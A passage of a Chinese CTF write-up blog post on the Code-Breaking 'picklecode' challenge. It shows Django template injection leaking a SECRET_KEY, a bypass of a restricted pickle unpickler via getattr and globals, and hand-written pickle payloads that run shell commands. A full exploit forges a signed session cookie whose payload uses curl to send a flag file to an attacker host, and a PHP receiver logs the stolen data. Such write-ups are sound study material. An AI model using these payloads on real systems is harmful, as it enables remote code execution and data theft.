<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">@login_required</span><br><span class="line">  def index(request):</span><br><span class="line">      django_engine = engines[&apos;django&apos;]</span><br><span class="line">      template = django_engine.from_string(&apos;My name is &apos; + request.user.username)</span><br><span class="line">      return HttpResponse(template.render(None, request))</span><br></pre></td></tr></table></figure>

<ul>
<li><p>随意构造一个 username 为 <code></code> 可以看到一个加密后的密码，这就验证了 SSTI</p>
<p><a href="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_1.png" target="_blank" rel="noopener"><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_1.png" alt="img"></a></p>
</li>
<li><p>在 <code>/template/registration/login.html</code> 的 <code>csrf_token</code> 处下个断点，可以看到有很多变量，其中有一部分是加载模板的时候传入的，还有一部分是 Django 自带的，可以在 <code>settings.py</code> 中的 <code>templates</code> 查看自带的变量</p>
<p><a href="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_2.png" target="_blank" rel="noopener"><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_2.png" alt="img"></a></p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">TEMPLATES = [</span><br><span class="line">      &#123;</span><br><span class="line">          &apos;BACKEND&apos;: &apos;django.template.backends.django.DjangoTemplates&apos;,</span><br><span class="line">          &apos;DIRS&apos;: [],</span><br><span class="line">          &apos;APP_DIRS&apos;: True,</span><br><span class="line">          &apos;OPTIONS&apos;: &#123;</span><br><span class="line">              &apos;context_processors&apos;: [</span><br><span class="line">                  &apos;django.template.context_processors.debug&apos;,</span><br><span class="line">                  &apos;django.template.context_processors.request&apos;,</span><br><span class="line">                  &apos;django.contrib.auth.context_processors.auth&apos;,</span><br><span class="line">                  &apos;django.contrib.messages.context_processors.messages&apos;,</span><br><span class="line">              ],</span><br><span class="line">          &#125;,</span><br><span class="line">      &#125;,</span><br><span class="line">  ]</span><br></pre></td></tr></table></figure>

<ul>
<li>这里的 <code>context_processors</code> 就代表会向模板中注入的一些上下文。通常来说， <code>request</code> 、 <code>user</code> 、和 <code>perms</code> 都是默认存在的，但显然， <code>settings</code> 是不存在的，我们无法直接在模板中读取 settings 中的信息，包括密钥。Django 的模板引擎有一定限制，比如<strong>无法读取用下划线开头的属性</strong></li>
<li>经过一番寻找，在 <code>request.user.groups.source_field.opts.app_config.module.admin.settings</code> 处发现 <code>SECRET_KEY</code> ，那就可以构造 username 为 <code>request.user.groups.source_field.opts.app_config.module.admin.settings.SECRET_KEY</code> 即可获取签名密钥了 <code>zs%o-mvuihtk6g4pgd+xpa&amp;1hh9%&amp;ulnf!@9qx8_y5kk+7^cvm</code></li>
<li>接着就是 pickle 的反序列化了，其核心文件为 <code>/core/serializer.py</code></li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line">import pickle</span><br><span class="line">  import io</span><br><span class="line">  import builtins</span><br><span class="line"></span><br><span class="line">  __all__ = (&apos;PickleSerializer&apos;, )</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  class RestrictedUnpickler(pickle.Unpickler):</span><br><span class="line">      blacklist = &#123;&apos;eval&apos;, &apos;exec&apos;, &apos;execfile&apos;, &apos;compile&apos;, &apos;open&apos;, &apos;input&apos;, &apos;__import__&apos;, &apos;exit&apos;&#125;</span><br><span class="line"></span><br><span class="line">      def find_class(self, module, name):</span><br><span class="line">          # Only allow safe classes from builtins.</span><br><span class="line">          if module == &quot;builtins&quot; and name not in self.blacklist:</span><br><span class="line">              return getattr(builtins, name)</span><br><span class="line">          # Forbid everything else.</span><br><span class="line">          raise pickle.UnpicklingError(&quot;global &apos;%s.%s&apos; is forbidden&quot; % (module, name))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">  class PickleSerializer():</span><br><span class="line">      def dumps(self, obj):</span><br><span class="line">          return pickle.dumps(obj)</span><br><span class="line"></span><br><span class="line">      def loads(self, data):</span><br><span class="line">          try:</span><br><span class="line">              if isinstance(data, str):</span><br><span class="line">                  raise TypeError(&quot;Can&apos;t load pickle from unicode string&quot;)</span><br><span class="line">              file = io.BytesIO(data)</span><br><span class="line">              return RestrictedUnpickler(file,encoding=&apos;ASCII&apos;, errors=&apos;strict&apos;).load()</span><br><span class="line">          except Exception as e:</span><br><span class="line">              return &#123;&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li>其中设置了一个反序列化沙盒，禁用了 <code>&#39;eval&#39;, &#39;exec&#39;, &#39;execfile&#39;, &#39;compile&#39;, &#39;open&#39;, &#39;input&#39;, &#39;__import__&#39;, &#39;exit&#39;</code> 并且只允许调用 python 内置函数</li>
<li>但是 <code>getattr</code> 这个万金油函数没有被限制，那就可以使用 <code>builtins.getattr(builtins,&#39;eval&#39;)</code> 来获取 <code>eval</code> 函数，这就相当于绕过了这个沙盒</li>
<li>首先执行 <code>getattr</code> 获取 <code>eval</code> 函数，再执行 <code>eval</code> 函数，这实际上是两步，而我们常用 <code>__reduce__</code> 生成的序列化字符串，只能执行一个函数，这就产生矛盾了，所以就要放弃 <code>__reduce__</code> 直接手写 pickle 代码</li>
<li>pickle 是一种堆栈语言，它没有变量名这个概念，pickle 的内容存储在 stack(栈) 和 memo(存储信息的列表) 中。首先将 payload <code>b&#39;\x80\x03cnt\nsystem\nq\x00X\x06\x00\x00\x00whoamiq\x01\x85q\x02Rq\x03.&#39;</code> 写进一个文件</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">import pickle</span><br><span class="line">  import os</span><br><span class="line"></span><br><span class="line">  class Person():</span><br><span class="line">      def __reduce__(self):</span><br><span class="line">          return (os.system, (&apos;whoami&apos;,))</span><br><span class="line"></span><br><span class="line">  person = Person()</span><br><span class="line">  f = open(&apos;pickle&apos;,&apos;wb&apos;)</span><br><span class="line">  pickle.dump(person ,f, protocol = 0)</span><br><span class="line">  f.close()</span><br></pre></td></tr></table></figure>

<ul>
<li><p>执行 <code>python -m pickletools pickle</code> 对其分析，得到一堆操作指令(opcode)</p>
<p><a href="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_4.png" target="_blank" rel="noopener"><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_4.png" alt="img"></a></p>
</li>
<li><p>阅读源码可以获得所有的 opcodes</p>
<p><a href="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_5.png" target="_blank" rel="noopener"><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_5.png" alt="img"></a></p>
</li>
<li><p>这段 pickle 代码所涉及到的部分符号意思如下 :</p>
</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">c : 引入模块和对象，模块名和对象名以换行符分割。（find_class校验就在这一步，也就是说，只要c这个OPCODE的参数没有被find_class限制，其他地方获取的对象就不会被沙盒影响了，这也是为什么要用getattr来获取对象）</span><br><span class="line">  p : 将栈顶的元素存储到memo中，p后面跟一个数字，就是表示这个元素在memo中的索引</span><br><span class="line">  ( : 压入一个标志到栈中，表示元组的开始位置</span><br><span class="line">  V : 向栈中压入一个(unicode)字符串</span><br><span class="line">  t : 从栈顶开始，找到最上面的一个(，并将(到t中间的内容全部弹出，组成一个元组，再把这个元组压入栈中</span><br><span class="line">  R : 从栈顶弹出一个可执行对象和一个元组，元组作为函数的参数列表执行，并将返回值压入栈上</span><br><span class="line">  . : 表示整个程序结束</span><br></pre></td></tr></table></figure>

<ul>
<li>那么这段 pickle 就很容易懂了</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">00: c    GLOBAL     &apos;nt system&apos; # 向栈顶压入 &apos;nt.system&apos; 这个可执行对象</span><br><span class="line">  11: p    PUT        0 # 将这个对象存储到 memo 的第 0 个位置</span><br><span class="line">  14: (    MARK # 压入一个元组的开始标志</span><br><span class="line">  15: V        UNICODE    &apos;whoami&apos; # 压入字符串&apos;whoami&apos;</span><br><span class="line">  23: p        PUT        1 # 将这个字符串存储到 memo 的第 1 个位置</span><br><span class="line">  26: t        TUPLE      (MARK at 14) # 将由刚压入栈中的字符串弹出，再将由这个字符串组成的元组压入栈中</span><br><span class="line">  27: p    PUT        2 # 将这个元组存储到 memo 的第 2 个位置</span><br><span class="line">  30: R    REDUCE # 从栈上弹出两个元素，分别是可执行对象和元组，并执行，这里即为 &apos;nt.system(&apos;whoami&apos;)&apos; ，将结果压入栈中</span><br><span class="line">  31: p    PUT        3 # 将栈顶的元素(也就是刚才执行的结果)存储到 memo 的第 3 个位置</span><br><span class="line">  34: .    STOP # 程序结束</span><br></pre></td></tr></table></figure>

<ul>
<li>简化为如下代码，memo 没有起到太大作用，但这段代码仍然可以执行命令</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">nt</span><br><span class="line">  system</span><br><span class="line">  (Vwhoami</span><br><span class="line">  tR.</span><br></pre></td></tr></table></figure>

<ul>
<li>接着开始写 pickle 代码</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">cbuiltins # 将 builtins 设为可执行对象</span><br><span class="line">  getattr # 获取 getattr 方法</span><br><span class="line">  (cbuiltins # 压入元组开始标志，并将 builtins 设为可执行对象</span><br><span class="line">  dict # 获取 dict 对象</span><br><span class="line">  S&apos;get&apos; # 压入字符串 &apos;get&apos;</span><br><span class="line">  tR(cbuiltins # 弹出 builtins.dict,get 并组成新的元组压入栈中。然后执行 builtins.getattr(builtins.dict,get) 得到 get 方法压入栈中。再压入元组标志，将 builtins 设为可执行对象</span><br><span class="line">  globals # 获取 builtins.globals</span><br><span class="line">  (tRS&apos;builtins&apos; # 压入元组标志，执行 builtins.globals，然后压入字符串 &apos;builtins&apos;</span><br><span class="line">  tRp1 # 执行 get(builtins)，获取到 builtins 对象存储到 memo[1] 处</span><br></pre></td></tr></table></figure>

<ul>
<li>python 代码</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line">import pickle</span><br><span class="line">  import builtins</span><br><span class="line"></span><br><span class="line">  data = b&apos;&apos;&apos;cbuiltins</span><br><span class="line">  getattr</span><br><span class="line">  (cbuiltins</span><br><span class="line">  dict</span><br><span class="line">  S&apos;get&apos;</span><br><span class="line">  tR(cbuiltins</span><br><span class="line">  globals</span><br><span class="line">  (tRS&apos;builtins&apos;</span><br><span class="line">  tRp1</span><br><span class="line">  .&apos;&apos;&apos;</span><br><span class="line"></span><br><span class="line">  data = pickle.loads(data)</span><br><span class="line"></span><br><span class="line">  print(data)</span><br><span class="line">  # &lt;module &apos;builtins&apos; (built-in)&gt;</span><br></pre></td></tr></table></figure>

<ul>
<li>然后利用这个没有限制的 <code>builtins</code> 对象获取危险函数，并执行，这就绕过了沙盒</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">cbuiltins # 将 builtins 设为可执行对象</span><br><span class="line">  getattr # 获取 getattr 方法</span><br><span class="line">  (g1 # 压入数组，压入上一步获取的 builtins 对象</span><br><span class="line">  S&apos;eval&apos; # 压入字符串 &apos;eval&apos;</span><br><span class="line">  tR(S&apos;__import__(&quot;os&quot;).system(&quot;id&quot;)&apos; # 获取到 eval 函数。将字符串 &apos;__import__(&quot;os&quot;).system(&quot;id&quot;)&apos; 压入</span><br><span class="line">  tR. # 执行 eval(&apos;__import__(&quot;os&quot;).system(&quot;id&quot;)&apos;)</span><br></pre></td></tr></table></figure>

<ul>
<li>上面都是绕过的分析，看一下本题有哪些可控点，考虑 <code>SESSIONID</code> ，接下来就看一下源码中对于它的操作</li>
<li>它使用的是 <code>django.contrib.sessions.backends.signed_cookies</code> 直接导入</li>
<li>python 代码</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">import pickle</span><br><span class="line">  import builtins</span><br><span class="line">  import io</span><br><span class="line"></span><br><span class="line">  class RestrictedUnpickler(pickle.Unpickler):</span><br><span class="line">    blacklist = &#123;&apos;exec&apos;, &apos;execfile&apos;, &apos;compile&apos;, &apos;open&apos;, &apos;input&apos;, &apos;__import__&apos;, &apos;exit&apos;&#125;</span><br><span class="line"></span><br><span class="line">    def find_class(self, module, name):</span><br><span class="line">        # Only allow safe classes from builtins.</span><br><span class="line">        if module == &quot;builtins&quot; and name not in self.blacklist:</span><br><span class="line">            return getattr(builtins, name)</span><br><span class="line">        # Forbid everything else.</span><br><span class="line">        raise pickle.UnpicklingError(&quot;global &apos;%s.%s&apos; is forbidden&quot; % (module, name))</span><br><span class="line"></span><br><span class="line">  def restricted_loads(s):</span><br><span class="line">    &quot;&quot;&quot;Helper function analogous to pickle.loads().&quot;&quot;&quot;</span><br><span class="line">    return RestrictedUnpickler(io.BytesIO(s)).load()</span><br><span class="line"></span><br><span class="line">  data = b&apos;&apos;&apos;cbuiltins</span><br><span class="line">  getattr</span><br><span class="line">  (cbuiltins</span><br><span class="line">  dict</span><br><span class="line">  S&apos;get&apos;</span><br><span class="line">  tR(cbuiltins</span><br><span class="line">  globals</span><br><span class="line">  (tRS&apos;builtins&apos;</span><br><span class="line">  tRp1</span><br><span class="line">  cbuiltins</span><br><span class="line">  getattr</span><br><span class="line">  (g1</span><br><span class="line">  S&apos;eval&apos;</span><br><span class="line">  tR(S&apos;__import__(&quot;os&quot;).system(&quot;id&quot;)&apos;</span><br><span class="line">  tR.</span><br><span class="line">  .&apos;&apos;&apos;</span><br><span class="line"></span><br><span class="line">  data = restricted_loads(data)</span><br><span class="line"></span><br><span class="line">  print(data)</span><br></pre></td></tr></table></figure>

<p><a href="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_6.png" target="_blank" rel="noopener"><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_6.png" alt="img"></a></p>
<ul>
<li>本题的 exp 如下，由于在同一个局域网就在物理机上写了一个接收的 php</li>
</ul>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line">from django.core import signing</span><br><span class="line">    import pickle</span><br><span class="line">    import builtins,io</span><br><span class="line">      import base64</span><br><span class="line">      import datetime</span><br><span class="line">      import json</span><br><span class="line">      import re</span><br><span class="line">      import time</span><br><span class="line">      import zlib</span><br><span class="line"></span><br><span class="line">      data = b&apos;&apos;&apos;cbuiltins</span><br><span class="line">      getattr</span><br><span class="line">      (cbuiltins</span><br><span class="line">      dict</span><br><span class="line">      S&apos;get&apos;</span><br><span class="line">      tR(cbuiltins</span><br><span class="line">      globals</span><br><span class="line">      (tRS&apos;builtins&apos;</span><br><span class="line">      tRp1</span><br><span class="line">      cbuiltins</span><br><span class="line">      getattr</span><br><span class="line">      (g1</span><br><span class="line">      S&apos;eval&apos;</span><br><span class="line">      tR(S&apos;__import__(&quot;os&quot;).system(&quot;curl http://192.168.0.100/xss/xss.php?$(cat /flag_djang0_p1ckle | base64)&quot;)&apos;</span><br><span class="line">      tR</span><br><span class="line">      .&apos;&apos;&apos;</span><br><span class="line"></span><br><span class="line">      def b64_encode(s):</span><br><span class="line">          return base64.urlsafe_b64encode(s).strip(b&apos;=&apos;)</span><br><span class="line"></span><br><span class="line">      def pickle_exp(SECRET_KEY):</span><br><span class="line">          global data</span><br><span class="line">          is_compressed = False</span><br><span class="line">          compress = False</span><br><span class="line">          if compress:</span><br><span class="line">              # Avoid zlib dependency unless compress is being used</span><br><span class="line">              compressed = zlib.compress(data)</span><br><span class="line">              if len(compressed) &lt; (len(data) - 1):</span><br><span class="line">                  data = compressed</span><br><span class="line">                  is_compressed = True</span><br><span class="line">          base64d = b64_encode(data).decode()</span><br><span class="line">          if is_compressed:</span><br><span class="line">              base64d = &apos;.&apos; + base64d</span><br><span class="line">          SECRET_KEY = SECRET_KEY</span><br><span class="line">          # 根据SECRET_KEY进行Cookie的制造</span><br><span class="line">          session = signing.TimestampSigner(key = SECRET_KEY,salt=&apos;django.contrib.sessions.backends.signed_cookies&apos;).sign(base64d)</span><br><span class="line">          print(session)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">      if __name__ == &apos;__main__&apos;:</span><br><span class="line">          SECRET_KEY = &apos;zs%o-mvuihtk6g4pgd+xpa&amp;1hh9%&amp;ulnf!@9qx8_y5kk+7^cvm&apos;</span><br><span class="line">          pickle_exp(SECRET_KEY)</span><br></pre></td></tr></table></figure>

<p><a href="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_7.png" target="_blank" rel="noopener"><img src="https://wcgimages.oss-cn-shenzhen.aliyuncs.com/code_breaking/pickle_7.png" alt="img"></a></p>
<ul>
<li><p>xss.php</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">$data = fopen(&quot;cookies.txt&quot;,&quot;a+&quot;);</span><br><span class="line"></span><br><span class="line">foreach ($_GET as $key=&gt;$value) </span><br><span class="line">&#123;</span><br><span class="line">  fwrite($data, $key.&quot;:&quot;.$value);</span><br><span class="line">  fwrite($data, &quot;\n&quot;);</span><br><span class="line">&#125;</span><br><span class="line">?&gt;</span><br></pre></td></tr></table></figure>

</li>
</ul>
<h1 id="thejs"><a href="#thejs" class="headerlink" title="thejs"></a>thejs</h1><ul>
<li>JS 原型污染，没找到对应源码</li>
<li><a href="https://bbs.pediy.com/thread-249643.htm" target="_blank" rel="noopener">Node.js原型污染攻击的分析与利用</a></li>
<li><a href="https://www.freebuf.com/articles/web/200406.html" target="_blank" rel="noopener">深入理解JavaScript Prototype污染攻击</a></li>
<li><a href="https://www.codercto.com/a/41487.html" target="_blank" rel="noopener">一个题解</a></li>
</ul>

    </div>

    
    
    
        
      

      <footer class="post-footer">
          
            
          
          <div class="post-tags">
            
              <a href="/tags/ctf/" rel="tag"># ctf</a>
            
          </div>
        

        

          <div class="post-nav">
            <div class="post-nav-next post-nav-item">
              
            </div>

            <span class="post-nav-divider"></span>

            <div class="post-nav-prev post-nav-item">
              
                <a href="/2020/03/03/记一次80万字符过狗注入/" rel="prev" title="记一次80万字符过狗注入">
                  记一次80万字符过狗注入 <i class="fa fa-chevron-right"></i>
                </a>
              
            </div>
          </div>
        
      </footer>
    
  </article>
  
  
  

  </div>


          </div>
          

        </div>
        
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">
        
        
        
        
      

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#function"><span class="nav-number">1.</span> <span class="nav-text">function</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#pcrewaf"><span class="nav-number">2.</span> <span class="nav-text">pcrewaf</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#phpmagic"><span class="nav-number">3.</span> <span class="nav-text">phpmagic</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#phplimit"><span class="nav-number">4.</span> <span class="nav-text">phplimit</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#nodechr"><span class="nav-number">5.</span> <span class="nav-text">nodechr</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#javacon"><span class="nav-number">6.</span> <span class="nav-text">javacon</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#lumenserial"><span class="nav-number">7.</span> <span class="nav-text">lumenserial</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#picklecode"><span class="nav-number">8.</span> <span class="nav-text">picklecode</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#thejs"><span class="nav-number">9.</span> <span class="nav-text">thejs</span></a></li></ol></div>
        
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">su33er</p>
  <div class="site-description" itemprop="description">心之所向皆是遗憾，目之所及皆是过往</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
        
          <a href="/archives/">
        
          <span class="site-state-item-count">11</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-categories">
        
          
            <a href="/categories/">
          
        
        <span class="site-state-item-count">7</span>
        <span class="site-state-item-name">categories</span>
        </a>
      </div>
    
      
      
      <div class="site-state-item site-state-tags">
        
          
            <a href="/tags/">
          
        
        <span class="site-state-item-count">10</span>
        <span class="site-state-item-name">tags</span>
        </a>
      </div>
    
  </nav>
</div>


  <div class="links-of-blogroll motion-element">
    <div class="links-of-blogroll-title">
      <i class="fa fa-fw fa-link"></i>
      Links
    </div>
    <ul class="links-of-blogroll-list">
        <li class="links-of-blogroll-item">
          <a href="https://mi1itray_axe.gitee.io/" title="https://mi1itray_axe.gitee.io/" rel="noopener" target="_blank">Team233核心人物-张大炮</a>
        </li>
      
    </ul>
  </div>

      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


        
      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

<div class="copyright">
  &copy; 
  <span itemprop="copyrightYear">2020</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">su33er</span>
</div>
  <!--<div class="powered-by">Powered by <a href="https://hexo.io" class="theme-link" rel="noopener" target="_blank">Hexo</a> v3.9.0
  </div>
-->
  <span class="post-meta-divider">|</span>
  <div class="theme-info">
      
    Theme – <a href="https://muse.theme-next.org" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> v7.4.1
  </div>

        












        
      </div>
    </footer>
  </div>
  
  <script src="/lib/anime.min.js?v=3.1.0"></script>
  <script src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  <script src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
<script src="/js/utils.js?v=7.4.1"></script><script src="/js/motion.js?v=7.4.1"></script>
<script src="/js/schemes/muse.js?v=7.4.1"></script>
<script src="/js/next-boot.js?v=7.4.1"></script>



  





















  

  

  

  


  

  
  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  

</body>
</html>
